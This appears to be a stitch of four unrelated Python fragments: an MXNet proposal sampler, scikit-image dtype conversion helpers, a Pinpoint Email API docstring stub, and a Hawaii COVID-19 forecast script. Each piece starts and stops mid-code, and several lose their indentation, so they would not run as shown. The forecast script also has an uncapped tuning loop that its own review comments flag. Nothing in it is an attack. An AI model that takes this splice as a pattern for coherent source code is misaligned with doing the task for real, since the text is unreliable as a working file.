    neg_thresh_high : float, default is 0.5
        Proposal whose IOU smaller than ``neg_thresh_high``
        and larger than ``neg_thresh_low``
        is regarded as negative samples.
        Proposals with IOU in between ``pos_thresh`` and ``neg_thresh_high`` are
        ignored.
    neg_thresh_low : float, default is 0.0
        See ``neg_thresh_high``.
    pos_ratio : float, default is 0.5
        ``pos_ratio`` defines how many positive samples (``pos_ratio * num_sample``) is
        to be sampled.
    neg_ratio : float or None
        ``neg_ratio`` defines how many negative samples (``neg_ratio * num_sample``) is
        to be sampled. If ``None`` is provided, it equals to ``1 - pos_ratio``.
    fill_negative : bool
        If ``True``, negative samples will fill the gap caused by insufficient positive samples.
        For example, if ``num_sample`` is 100, ``pos_ratio`` and ``neg_ratio`` are both ``0.5``.
        Available positive sample and negative samples are 10 and 10000, which are typical values.
        Now, the output positive samples is 10(intact), since it's smaller than ``50(100 * 0.5)``,
        the negative samples will fill the rest ``40`` slots.
        If ``fill_negative == False``, the ``40`` slots is filled with ``-1(ignore)``.
    """
    def __init__(self, num_sample, pos_thresh, neg_thresh_high, neg_thresh_low=-np.inf,
                 pos_ratio=0.5, neg_ratio=None, fill_negative=True):
        super(QuotaSampler, self).__init__()
        self._fill_negative = fill_negative
        self._num_sample = num_sample
        # BUG FIX: the original only assigned self._neg_ratio when neg_ratio
        # was None, so passing an explicit neg_ratio crashed the assert below
        # with AttributeError.  Callers passing None are unaffected.
        self._neg_ratio = (1. - pos_ratio) if neg_ratio is None else neg_ratio
        self._pos_ratio = pos_ratio
        assert (self._neg_ratio + self._pos_ratio) <= 1.0, (
            "Positive and negative ratio {} exceed 1".format(self._neg_ratio + self._pos_ratio))
        # thresholds are clamped into the valid IOU range [0, 1]
        self._pos_thresh = min(1., max(0., pos_thresh))
        self._neg_thresh_high = min(1., max(0., neg_thresh_high))
        self._neg_thresh_low = neg_thresh_low

    def forward(self, matches, ious):
        """Quota Sampler

        Parameters:
        ----------
        matches : NDArray or Symbol
            Matching results, positive number for positive matching, -1 for not matched.
        ious : NDArray or Symbol
            IOU overlaps with shape (N, M), batching is supported.

        Returns:
        --------
        NDArray or Symbol
            Sampling results with same shape as ``matches``.
            1 for positive, -1 for negative, 0 for ignore.
        """
        F = mx.nd
        max_pos = int(round(self._pos_ratio * self._num_sample))
        max_neg = int(self._neg_ratio * self._num_sample)
        results = []
        for i in range(matches.shape[0]):
            # init with 0s, which are ignored
            # (consistent with QuotaSamplerOp: use matches[i]; identical shape
            # to matches[0], so behavior is unchanged)
            result = F.zeros_like(matches[i])
            # positive samples: either matched or with IOU above pos_thresh
            ious_max = ious.max(axis=-1)[i]
            result = F.where(matches[i] >= 0, F.ones_like(result), result)
            result = F.where(ious_max >= self._pos_thresh, F.ones_like(result), result)
            # negative samples with label -1: IOU in [neg_thresh_low, neg_thresh_high)
            neg_mask = ious_max < self._neg_thresh_high
            neg_mask = neg_mask * (ious_max >= self._neg_thresh_low)
            result = F.where(neg_mask, F.ones_like(result) * -1, result)
            # re-balance if number of positive or negative exceed limits
            result = result.asnumpy()
            num_pos = int((result > 0).sum())
            if num_pos > max_pos:
                disable_indices = np.random.choice(
                    np.where(result > 0)[0], size=(num_pos - max_pos), replace=False)
                result[disable_indices] = 0  # use 0 to ignore
            num_neg = int((result < 0).sum())
            if self._fill_negative:
                # if pos_sample is less than quota, we can have negative samples filling the gap
                # NOTE(review): max_neg ratchets upward across batch items here
                # (matches upstream behavior) — confirm this is intended.
                max_neg = max(self._num_sample - min(num_pos, max_pos), max_neg)
            if num_neg > max_neg:
                disable_indices = np.random.choice(
                    np.where(result < 0)[0], size=(num_neg - max_neg), replace=False)
                result[disable_indices] = 0
            results.append(mx.nd.array(result))
        # stack per-image results back into a batch
        return mx.nd.stack(*results, axis=0)
class QuotaSamplerOp(mx.operator.CustomOp):
"""Sampler that handles limited quota for positive and negative samples.
This is a custom Operator used inside HybridBlock.
Parameters
----------
num_sample : int, default is 128
Number of samples for RCNN targets.
pos_iou_thresh : float, default is 0.5
Proposal whose IOU larger than ``pos_iou_thresh`` is regarded as positive samples.
neg_iou_thresh_high : float, default is 0.5
Proposal whose IOU smaller than ``neg_iou_thresh_high``
and larger than ``neg_iou_thresh_low``
is regarded as negative samples.
Proposals with IOU in between ``pos_iou_thresh`` and ``neg_iou_thresh`` are
ignored.
neg_iou_thresh_low : float, default is 0.0
See ``neg_iou_thresh_high``.
pos_ratio : float, default is 0.25
``pos_ratio`` defines how many positive samples (``pos_ratio * num_sample``) is
to be sampled.
neg_ratio : float or None
``neg_ratio`` defines how many negative samples (``pos_ratio * num_sample``) is
to be sampled. If ``None`` is provided, it equals to ``1 - pos_ratio``.
fill_negative : bool
If ``True``, negative samples will fill the gap caused by insufficient positive samples.
For example, if ``num_sample`` is 100, ``pos_ratio`` and ``neg_ratio`` are both ``0.5``.
Available positive sample and negative samples are 10 and 10000, which are typical values.
Now, the output positive samples is 10(intact), since it's smaller than ``50(100 * 0.5)``,
the negative samples will fill the rest ``40`` slots.
If ``fill_negative == False``, the ``40`` slots is filled with ``-1(ignore)``.
"""
def __init__(self, num_sample, pos_thresh, neg_thresh_high=0.5, neg_thresh_low=-np.inf,
pos_ratio=0.5, neg_ratio=None, fill_negative=True):
super(QuotaSamplerOp, self).__init__()
self._num_sample = num_sample
self._fill_negative = fill_negative
if neg_ratio is None:
self._neg_ratio = 1. - pos_ratio
self._pos_ratio = pos_ratio
assert (self._neg_ratio + self._pos_ratio) <= 1.0, (
"Positive and negative ratio {} exceed 1".format(self._neg_ratio + self._pos_ratio))
self._pos_thresh = min(1., max(0., pos_thresh))
self._neg_thresh_high = min(1., max(0., neg_thresh_high))
self._neg_thresh_low = neg_thresh_low
def forward(self, is_train, req, in_data, out_data, aux):
"""Quota Sampler
Parameters:
----------
in_data: array-like of Symbol
[matches, ious], see below.
matches : NDArray or Symbol
Matching results, positive number for positive matching, -1 for not matched.
ious : NDArray or Symbol
IOU overlaps with shape (N, M), batching is supported.
Returns:
--------
NDArray or Symbol
Sampling results with same shape as ``matches``.
1 for positive, -1 for negative, 0 for ignore.
"""
matches = in_data[0]
ious = in_data[1]
F = mx.nd
max_pos = int(round(self._pos_ratio * self._num_sample))
max_neg = int(self._neg_ratio * self._num_sample)
for i in range(matches.shape[0]):
# init with 0s, which are ignored
result = F.zeros_like(matches[i])
# negative samples with label -1
ious_max = ious.max(axis=-1)[i]
neg_mask = ious_max < self._neg_thresh_high
neg_mask = neg_mask * | |
Illuminant=D65
# NOTE: this is actually the XYZ values for the illuminant above.
lab_ref_white = np.array([0.95047, 1., 1.08883])
# XYZ coordinates of the illuminants, scaled to [0, 1]. For each illuminant I
# we have:
#
# illuminant[I][0] corresponds to the XYZ coordinates for the 2 degree
# field of view.
#
# illuminant[I][1] corresponds to the XYZ coordinates for the 10 degree
# field of view.
#
# The XYZ coordinates are calculated from [1], using the formula:
#
# X = x * ( Y / y )
# Y = Y
# Z = ( 1 - x - y ) * ( Y / y )
#
# where Y = 1. The only exception is the illuminant "D65" with aperture angle
# 2, whose coordinates are copied from 'lab_ref_white' for
# backward-compatibility reasons.
#
# References
# ----------
# .. [1] https://en.wikipedia.org/wiki/Standard_illuminant
illuminants = \
{"A": {'2': (1.098466069456375, 1, 0.3558228003436005),
'10': (1.111420406956693, 1, 0.3519978321919493)},
"D50": {'2': (0.9642119944211994, 1, 0.8251882845188288),
'10': (0.9672062750333777, 1, 0.8142801513128616)},
"D55": {'2': (0.956797052643698, 1, 0.9214805860173273),
'10': (0.9579665682254781, 1, 0.9092525159847462)},
"D65": {'2': (0.95047, 1., 1.08883), # This was: `lab_ref_white`
'10': (0.94809667673716, 1, 1.0730513595166162)},
"D75": {'2': (0.9497220898840717, 1, 1.226393520724154),
'10': (0.9441713925645873, 1, 1.2064272211720228)},
"E": {'2': (1.0, 1.0, 1.0),
'10': (1.0, 1.0, 1.0)}}
__all__ = ['img_as_float32', 'img_as_float64', 'img_as_float',
#'img_as_int', 'img_as_uint', 'img_as_ubyte',
#'img_as_bool',
'dtype_limits']
# For integers Numpy uses `_integer_types` basis internally, and builds a leaky
# `np.XintYY` abstraction on top of it. This leads to situations when, for
# example, there are two np.Xint64 dtypes with the same attributes but
# different object references. In order to avoid any potential issues,
# we use the basis dtypes here. For more information, see:
# - https://github.com/scikit-image/scikit-image/issues/3043
# For convenience, for these dtypes we indicate also the possible bit depths
# (some of them are platform specific). For the details, see:
# http://www.unix.org/whitepapers/64bit.html
_integer_types = (np.byte, np.ubyte, # 8 bits
np.short, np.ushort, # 16 bits
np.intc, np.uintc, # 16 or 32 or 64 bits
np.int_, np.uint, # 32 or 64 bits
np.longlong, np.ulonglong) # 64 bits
_integer_ranges = {t: (np.iinfo(t).min, np.iinfo(t).max)
for t in _integer_types}
dtype_range = {np.bool_: (False, True),
np.bool8: (False, True),
np.float16: (-1, 1),
np.float32: (-1, 1),
np.float64: (-1, 1)}
dtype_range.update(_integer_ranges)
_supported_types = list(dtype_range.keys())
def dtype_limits(image, clip_negative=False):
    """Return intensity limits, i.e. (min, max) tuple, of the image's dtype.

    Parameters
    ----------
    image : ndarray
        Input image.
    clip_negative : bool, optional
        If True, clip the negative range (i.e. return 0 for min intensity)
        even if the image dtype allows negative values.

    Returns
    -------
    imin, imax : tuple
        Lower and upper intensity limits.
    """
    imin, imax = dtype_range[image.dtype.type]
    return (0 if clip_negative else imin), imax
def _dtype_itemsize(itemsize, *dtypes):
"""Return first of `dtypes` with itemsize greater than `itemsize`
Parameters
----------
itemsize: int
The data type object element size.
Other Parameters
----------------
*dtypes:
Any Object accepted by `np.dtype` to be converted to a data
type object
Returns
-------
dtype: data type object
First of `dtypes` with itemsize greater than `itemsize`.
"""
return next(dt for dt in dtypes if np.dtype(dt).itemsize >= itemsize)
def _dtype_bits(kind, bits, itemsize=1):
"""Return dtype of `kind` that can store a `bits` wide unsigned int
Parameters:
kind: str
Data type kind.
bits: int
Desired number of bits.
itemsize: int
The data type object element size.
Returns
-------
dtype: data type object
Data type of `kind` that can store a `bits` wide unsigned int
"""
s = next(i for i in (itemsize, ) + (2, 4, 8) if
bits < (i * 8) or (bits == (i * 8) and kind == 'u'))
return np.dtype(kind + str(s))
def _scale(a, n, m, copy=True):
    """Scale an array of unsigned/positive integers from `n` to `m` bits.

    Numbers can be represented exactly only if `m` is a multiple of `n`.

    Parameters
    ----------
    a : ndarray
        Input image array.
    n : int
        Number of bits currently used to encode the values in `a`.
    m : int
        Desired number of bits to encode the values in `out`.
    copy : bool, optional
        If True, allocates and returns new array. Otherwise, modifies
        `a` in place.

    Returns
    -------
    out : array
        Output image array. Has the same kind as `a`.
    """
    kind = a.dtype.kind
    if n > m and a.max() < 2 ** m:
        # All values already fit in m bits: just shrink the container, no
        # rescaling needed.  mnew/n are rounded up to even widths only to
        # produce a sensible dtype name in the warning message.
        mnew = int(np.ceil(m / 2) * 2)
        if mnew > m:
            dtype = "int{}".format(mnew)
        else:
            dtype = "uint{}".format(mnew)
        n = int(np.ceil(n / 2) * 2)
        warn("Downcasting {} to {} without scaling because max "
             "value {} fits in {}".format(a.dtype, dtype, a.max(), dtype),
             stacklevel=3)
        return a.astype(_dtype_bits(kind, m))
    elif n == m:
        # same width: at most a copy
        return a.copy() if copy else a
    elif n > m:
        # downscale with precision loss
        if copy:
            b = np.empty(a.shape, _dtype_bits(kind, m))
            # floor-divide into the smaller container in one pass
            np.floor_divide(a, 2**(n - m), out=b, dtype=a.dtype,
                            casting='unsafe')
            return b
        else:
            a //= 2**(n - m)
            return a
    elif m % n == 0:
        # exact upscale to a multiple of `n` bits
        if copy:
            b = np.empty(a.shape, _dtype_bits(kind, m))
            np.multiply(a, (2**m - 1) // (2**n - 1), out=b, dtype=b.dtype)
            return b
        else:
            a = a.astype(_dtype_bits(kind, m, a.dtype.itemsize), copy=False)
            a *= (2**m - 1) // (2**n - 1)
            return a
    else:
        # upscale to a multiple of `n` bits,
        # then downscale with precision loss
        o = (m // n + 1) * n
        if copy:
            b = np.empty(a.shape, _dtype_bits(kind, o))
            np.multiply(a, (2**o - 1) // (2**n - 1), out=b, dtype=b.dtype)
            b //= 2**(o - m)
            return b
        else:
            a = a.astype(_dtype_bits(kind, o, a.dtype.itemsize), copy=False)
            a *= (2**o - 1) // (2**n - 1)
            a //= 2**(o - m)
            return a
def convert(image, dtype, force_copy=False, uniform=False):
"""
Convert an image to the requested data-type.
Warnings are issued in case of precision loss, or when negative values
are clipped during conversion to unsigned integer types (sign loss).
Floating point values are expected to be normalized and will be clipped
to the range [0.0, 1.0] or [-1.0, 1.0] when converting to unsigned or
signed integers respectively.
Numbers are not shifted to the negative side when converting from
unsigned to signed integer types. Negative values will be clipped when
converting to unsigned integers.
Parameters
----------
image : ndarray
Input image.
dtype : dtype
Target data-type.
force_copy : bool, optional
Force a copy of the data, irrespective of its current dtype.
uniform : bool, optional
Uniformly quantize the floating point range to the integer range.
By default (uniform=False) floating point values are scaled and
rounded to the nearest integers, which minimizes back and forth
conversion errors.
.. versionchanged :: 0.15
``convert`` no longer warns about possible precision or sign
information loss. See discussions on these warnings at:
https://github.com/scikit-image/scikit-image/issues/2602
https://github.com/scikit-image/scikit-image/issues/543#issuecomment-208202228
https://github.com/scikit-image/scikit-image/pull/3575
References
----------
.. [1] DirectX data conversion rules.
https://msdn.microsoft.com/en-us/library/windows/desktop/dd607323%28v=vs.85%29.aspx
.. [2] Data Conversions. In "OpenGL ES 2.0 Specification v2.0.25",
pp 7-8. Khronos Group, 2010.
.. [3] Proper treatment of pixels as integers. <NAME>.
In "Graphics Gems I", pp 249-256. <NAME>, 1990.
.. [4] Dirty Pixels. <NAME>. In "Jim Blinn's corner: Dirty Pixels",
pp 47-57. <NAME>, 1998.
"""
image = np.asarray(image)
dtypeobj_in = image.dtype
if dtype is np.floating:
dtypeobj_out = np.dtype("float64")
else:
dtypeobj_out = np.dtype(dtype)
dtype_in = dtypeobj_in.type
dtype_out = dtypeobj_out.type
kind_in = dtypeobj_in.kind
kind_out = dtypeobj_out.kind
itemsize_in = dtypeobj_in.itemsize
itemsize_out = dtypeobj_out.itemsize
# Below, we do an `issubdtype` check. Its purpose is to find out
# whether we can get away without doing any image conversion. This happens
# when:
#
# - the output and input dtypes are the same or
# - when the output is specified as a type, and the input dtype
# is a subclass of that type (e.g. `np.floating` will allow
# `float32` and `float64` arrays through)
if np.issubdtype(dtype_in, np.obj2sctype(dtype)):
if force_copy:
image = image.copy()
return image
if not (dtype_in in _supported_types and dtype_out in _supported_types):
raise ValueError("Can not convert from {} to {}."
.format(dtypeobj_in, dtypeobj_out))
if kind_in in 'ui':
imin_in = np.iinfo(dtype_in).min
imax_in = np.iinfo(dtype_in).max
if kind_out in 'ui':
imin_out = np.iinfo(dtype_out).min
imax_out = np.iinfo(dtype_out).max
# any -> binary
if kind_out == 'b':
return image > dtype_in(dtype_range[dtype_in][1] / 2)
# binary -> any
if kind_in == 'b':
result = image.astype(dtype_out)
if kind_out != 'f':
| |
Raw message.
- **Simple** *(dict) --*
The simple email message. The message consists of a subject and a message body.
- **Subject** *(dict) --* **[REQUIRED]**
The subject line of the email. The subject line can only contain 7-bit ASCII characters. However, you can specify non-ASCII characters in the subject line by using encoded-word syntax, as described in `RFC 2047 <https://tools.ietf.org/html/rfc2047>`__ .
- **Data** *(string) --* **[REQUIRED]**
The content of the message itself.
- **Charset** *(string) --*
The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .
- **Body** *(dict) --* **[REQUIRED]**
The body of the message. You can specify an HTML version of the message, a text-only version of the message, or both.
- **Text** *(dict) --*
An object that represents the version of the message that is displayed in email clients that don\'t support HTML, or clients where the recipient has disabled HTML rendering.
- **Data** *(string) --* **[REQUIRED]**
The content of the message itself.
- **Charset** *(string) --*
The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .
- **Html** *(dict) --*
An object that represents the version of the message that is displayed in email clients that support HTML. HTML messages can include formatted text, hyperlinks, images, and more.
- **Data** *(string) --* **[REQUIRED]**
The content of the message itself.
- **Charset** *(string) --*
The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .
- **Raw** *(dict) --*
The raw email message. The message has to meet the following criteria:
* The message has to contain a header and a body, separated by one blank line.
* All of the required header fields must be present in the message.
* Each part of a multipart MIME message must be formatted properly.
* If you include attachments, they must be in a file format that Amazon Pinpoint supports.
* The entire message must be Base64 encoded.
* If any of the MIME parts in your message contain content that is outside of the 7-bit ASCII character range, you should encode that content to ensure that recipients\' email clients render the message properly.
* The length of any single line of text in the message can\'t exceed 1,000 characters. This restriction is defined in `RFC 5321 <https://tools.ietf.org/html/rfc5321>`__ .
- **Data** *(bytes) --* **[REQUIRED]**
The raw email message. The message has to meet the following criteria:
* The message has to contain a header and a body, separated by one blank line.
* All of the required header fields must be present in the message.
* Each part of a multipart MIME message must be formatted properly.
* Attachments must be in a file format that Amazon Pinpoint supports.
* The entire message must be Base64 encoded.
* If any of the MIME parts in your message contain content that is outside of the 7-bit ASCII character range, you should encode that content to ensure that recipients\' email clients render the message properly.
* The length of any single line of text in the message can\'t exceed 1,000 characters. This restriction is defined in `RFC 5321 <https://tools.ietf.org/html/rfc5321>`__ .
:type EmailTags: list
:param EmailTags:
A list of tags, in the form of name/value pairs, to apply to an email that you send using the ``SendEmail`` operation. Tags correspond to characteristics of the email that you define, so that you can publish email sending events.
- *(dict) --*
Contains the name and value of a tag that you apply to an email. You can use message tags when you publish email sending events.
- **Name** *(string) --* **[REQUIRED]**
The name of the message tag. The message tag name has to meet the following criteria:
* It can only contain ASCII letters (a–z, A–Z), numbers (0–9), underscores (_), or dashes (-).
* It can contain no more than 256 characters.
- **Value** *(string) --* **[REQUIRED]**
The value of the message tag. The message tag value has to meet the following criteria:
* It can only contain ASCII letters (a–z, A–Z), numbers (0–9), underscores (_), or dashes (-).
* It can contain no more than 256 characters.
:type ConfigurationSetName: string
:param ConfigurationSetName:
The name of the configuration set that you want to use when sending the email.
:rtype: dict
:returns:
"""
pass
def tag_resource(self, ResourceArn: str, Tags: List) -> Dict:
"""
Add one or more tags (keys and values) to one or more specified resources. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.
Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for more specific tag values. A tag value acts as a descriptor within a tag key.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/pinpoint-email-2018-07-26/TagResource>`_
**Request Syntax**
::
response = client.tag_resource(
ResourceArn='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type ResourceArn: string
:param ResourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the resource that you want to add one or more tags to.
:type Tags: list
:param Tags: **[REQUIRED]**
A list of the tags that you want to add to the resource. A tag consists of a required tag key (``Key`` ) and an associated tag value (``Value`` ). The maximum length of a tag key is 128 characters. The maximum length of a tag value is 256 characters.
- *(dict) --*
An object that defines the tags that are associated with a resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.
Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for a more specific tag value. A tag value acts as a descriptor within a tag key. For example, if you have two versions of an Amazon Pinpoint project, one for internal testing and another for external use, you might assign a ``Stack`` tag key to both projects. The value of the ``Stack`` tag key might be ``Test`` for one project and ``Production`` for the other project.
A tag key can contain as many as 128 characters. A tag value can contain as many as 256 characters. The characters can be Unicode letters, digits, white space, or one of the following symbols: _ . : / = + -. The following additional restrictions apply to tags:
* Tag keys and values are case sensitive.
* For each associated resource, each tag key must be unique and it can have | |
<reponame>levidantzinger/hawaii_covid_forecast
#########################################################
############### ~ Import Libraries ~ ####################
#########################################################
import numpy as np
import pandas as pd
import scipy.integrate as integrate
from dd_model.model import run_scenario
from bokeh.plotting import figure, output_file, show
from bokeh.models import ColumnDataSource
from bokeh.models.tools import HoverTool
from datetime import datetime, date, timedelta
from dateutil.parser import parse
from bokeh.models import HoverTool
from bokeh.models.widgets import Tabs, Panel
import csv
import json
import time
from bokeh.resources import CDN
from bokeh.embed import file_html
import plotly.graph_objects as go
import plotly.express as px
from plotly.subplots import make_subplots
import chart_studio.plotly as py
import chart_studio
from hdc_api.sheets import get_test_positivity, get_rt, get_cases, get_hdc_covid_data
from functions.functions import ndays, rt_ndays, infected_travelers, run_model, add_reported_new_cases, get_active_cases, insert_active_cases, get_start_date_index, load_hdc_data, create_bokeh_graph_df
from functions.visualizations import initialize_plotting_function, forecast_graph, create_forecast_graphs, create_oahu_reopening_graph_plotly, create_case_situation_graph, create_positivity_situation_graph
#########################################################
################### ~ Load Dfs ~ ########################
#########################################################
# Formats dates to reflect the following example: 9/7/2020 or 2020-9-7 (# or - represents removing 0s)
# format_date_str = "%#m/%#d/%Y" # PC (Windows strftime uses '#' to drop leading zeros)
format_date_str = "%-m/%-d/%Y" # Mac/Linux
# Load COVID data from HDC (scraped from DOH)
hdc_covid_data_df = get_hdc_covid_data()
#########################################################
##################### ~ Set Dates ~ #####################
#########################################################
# Used for JSON update due to potential lag from today's date to model begin (resulting from covidtracking.org not updating until 1pm)
todays_date = str(datetime.now().strftime(format_date_str))
# Used for CSV creation (slashes are not valid in file names)
todays_date_f_string = todays_date.replace('/', '.')
# Sets 'today' (when the forecast output begins based on available historic data) - used to initialize start of the forecast
data_lag = 0
if list(hdc_covid_data_df['Date'])[-1] != todays_date:
    # Sets 'today' back to the end of the historic data to ensure no data gap.
    # NOTE(review): the comparison above matches the last 'Date' against a
    # formatted string while the subtraction below treats it as a Timestamp --
    # confirm the 'Date' column dtype supports both.
    data_lag = (pd.to_datetime(todays_date) - list(hdc_covid_data_df['Date'])[-1]).days
else:
    data_lag = 0
today = str((datetime.now() - timedelta(days = data_lag)).strftime(format_date_str))
# Set initialization days and length of the forecast (recommend keeping consistent and only change situationally for specific scenarios)
initialization_days = 15
forecast_length = 13
Model_Begin = str((datetime.now() - timedelta(days = initialization_days)).strftime(format_date_str))
# Negative timedelta pushes Model_End `forecast_length` days into the future.
Model_End = str((datetime.now() - timedelta(days = -forecast_length)).strftime(format_date_str))
# Calculates time difference between model start and current date (used in data cleaning function)
ndays_today_Model_Begin = (ndays(Model_Begin, today))
#########################################################
################# ~ Set Parameters ~ ####################
#########################################################
# Model parameters used to move from Reported New Cases to Estimated Number of Initial Infections
shift_days = 7
cases_scale = 7
# Populations:
oahu = 953207
all_islands = 1415872
# Set Rt values for initialization, pessimistic, and expected scenarios
rt_initialization = 2.0
rt_estimate_pessimistic = 1.04
rt_estimate_expected = 1.00
# SEIR-style timing parameters (presumably in days -- confirm against dd_model.model)
incubation = 3
infectious_duration = 6
delay = 3
hosp_stay = 7
ICU_stay = 10
# Compartment flow rates; these three are re-tuned by the optimization loop below.
hospitalization_rate = 0.0118
hospitalization_ICU_rate = 0.197
ICU_hosp_rate = 0.001
# Set [Exposed, Infected] travelers for each day in respective range of dates
travel_values = [[4, 0], # rt_initialization - rt_estimate
                 [3, 0]] # rt_estimate - Model_End
# Set how much historical data is included in df & number of rolling days for reported new cases average
historical_days = 30
rolling_mean_days = 7
# Set how many days of Reported New Cases are summed to get the Active Cases for Quarantine
rolling_sum_days = 14
#########################################################
##### ~ Get Values for Initial Compartment Vector ~ #####
#########################################################
def loop_through_model():
    """Run the pessimistic and expected forecast scenarios once.

    Reads the module-level parameters (rt_initialization, hospitalization_rate,
    hospitalization_ICU_rate, ICU_hosp_rate, Model_Begin/Model_End, ...), so
    calling it again after the optimization loop rebinds those globals picks
    up the new values.

    Returns:
        tuple: (expected_14, pessimistic_14, expected_active, pessimistic_active)
            forecast DataFrames for the two scenarios plus their active-case series.
    """
    # To start calculation for Estimated Number of Initial Infections,
    # get the first day in day range equal to range of duration of infectious period,
    # which when summed will account for total persons in the I compartment (infected) based on the Model Begin date
    start_index = [e for e, i in enumerate(hdc_covid_data_df['Date']) if i == pd.to_datetime(Model_Begin) + timedelta(shift_days - infectious_duration)][0]
    # Sum Reported New Cases for duration of infection,
    # then scale by the cases_scale factor to estimate true number of infected.
    initial_infections = hdc_covid_data_df[start_index : start_index + (infectious_duration + 1)]['Cases'].sum() * cases_scale
    # Get initial values from historical data for hospitalizations, ICU, and deaths
    initial_hospitalizations = int(hdc_covid_data_df['Hospitalizations'][hdc_covid_data_df['Date'] == pd.to_datetime(Model_Begin)])
    # NOTE(review): the two lines below compare 'Date' against the raw string
    # Model_Begin while the line above converts via pd.to_datetime -- confirm
    # both comparisons actually match rows.
    initial_ICU = int(hdc_covid_data_df['ICU'][hdc_covid_data_df['Date'] == Model_Begin])
    # NOTE(review): "+ -4" looks like a hard-coded manual correction to the
    # reported death count -- confirm why, and document or remove.
    initial_Deaths = int(hdc_covid_data_df['Deaths'][hdc_covid_data_df['Date'] == Model_Begin]) + -4
    #########################################################
    #################### ~ Run Model ~ ######################
    #########################################################
    # Date Rt for pessimistic / expected begins. Starts ~1 week prior to today's date to smooth curve
    rt_estimate_start = str((datetime.now() - timedelta(days = 9)).strftime(format_date_str))
    # Run pessimistic & expected scenarios
    pessimistic_14 = run_model([Model_Begin, Model_End, initial_hospitalizations, initial_ICU, initial_Deaths, all_islands, initial_infections, incubation, infectious_duration, delay, hosp_stay, ICU_stay, hospitalization_rate, hospitalization_ICU_rate, ICU_hosp_rate], # Select which population to use in simulation
                               [Model_Begin, rt_estimate_start], # Dates for Rt changes
                               [rt_initialization, rt_estimate_pessimistic], # Rt values beginning on above dates
                               travel_values,
                               all_islands,
                               Model_End)
    expected_14 = run_model([Model_Begin, Model_End, initial_hospitalizations, initial_ICU, initial_Deaths, all_islands, initial_infections, incubation, infectious_duration, delay, hosp_stay, ICU_stay, hospitalization_rate, hospitalization_ICU_rate, ICU_hosp_rate],
                            [Model_Begin, rt_estimate_start],
                            [rt_initialization, rt_estimate_expected],
                            travel_values,
                            all_islands,
                            Model_End)
    ############# ~ Add Reported New Cases ~ ################
    # Run add_reported_new_cases for both scenarios
    pessimistic_14 = add_reported_new_cases('Pessimistic', pessimistic_14, shift_days, cases_scale, ndays_today_Model_Begin)
    expected_14 = add_reported_new_cases('Expected', expected_14, shift_days, cases_scale, ndays_today_Model_Begin)
    #########################################################
    ################# ~ Add Active Cases ~ ##################
    #########################################################
    # Run get_active_cases for both scenarios
    pessimistic_active = get_active_cases(pessimistic_14, hdc_covid_data_df, 'Pessimistic', rolling_sum_days)
    expected_active = get_active_cases(expected_14, hdc_covid_data_df, 'Expected', rolling_sum_days)
    # Add active cases to forecast dfs
    # expected_14['Active_Cases'] = expected_active['Active_Cases'][-len(expected_14.index):].values
    # pessimistic_14['Active_Cases'] = pessimistic_active['Active_Cases'][-len(pessimistic_14.index):].values
    insert_active_cases(expected_14, expected_active)
    insert_active_cases(pessimistic_14, pessimistic_active)
    return expected_14, pessimistic_14, expected_active, pessimistic_active
#########################################################
########## ~ Create Forecast Graphs (Bokeh) ~ ###########
#########################################################
# first run for initialization
expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
# Create df for graphs
hdc_covid_data_df_historical_graph, active_historical = create_bokeh_graph_df(hdc_covid_data_df, rolling_mean_days, historical_days, pessimistic_active)
# Parameter optimization: nudge one model parameter per metric by 1% per
# iteration until the first forecast day lands within +/-0.5% of the latest
# observation.  Index mapping: 0 -> rt_initialization (cases),
# 1 -> hospitalization_rate, 2 -> hospitalization_ICU_rate (ICU),
# 3 -> ICU_hosp_rate (deaths).
latest_cases, latest_hospitalizations, latest_ICU, latest_deaths = list(hdc_covid_data_df_historical_graph['Reported_New_Cases'])[-1], list(hdc_covid_data_df_historical_graph['Hospitalizations'])[-1], list(hdc_covid_data_df_historical_graph['ICU'])[-1], list(hdc_covid_data_df_historical_graph['Deaths'])[-1]
first_day_forecast_cases, first_day_forecast_hospitalizations, first_day_forecast_ICU, first_day_forecast_deaths = list(expected_14['Reported_New_Cases'])[0], list(expected_14['Hospitalizations'])[0], list(expected_14['ICU'])[0], list(expected_14['Deaths'])[0]
latest_list = [latest_cases, latest_hospitalizations, latest_ICU, latest_deaths]
first_day_forecast_list = [first_day_forecast_cases, first_day_forecast_hospitalizations, first_day_forecast_ICU, first_day_forecast_deaths]
for i, (latest, first_day_forecast) in enumerate(zip(latest_list, first_day_forecast_list)):
    print("Current variable: " + str(latest))
    # Already within the 0.5% tolerance band -- nothing to tune for this metric.
    if 0.995 < (latest / first_day_forecast) < 1.005:
        continue
    # NOTE(review): no iteration cap and no divide-by-zero guard -- if
    # first_day_forecast is 0, or the 1% steps oscillate around the band,
    # this loop raises or never terminates.  Confirm acceptable.
    while (0.995 > (latest / first_day_forecast)) or ((latest / first_day_forecast) > 1.005):
        if (latest / first_day_forecast) < 1:
            # Forecast is above the observation: shrink the relevant parameter
            # by 1% and re-run (loop_through_model reads these module globals).
            if i == 0:
                rt_initialization = rt_initialization - (rt_initialization * 0.01)
                expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
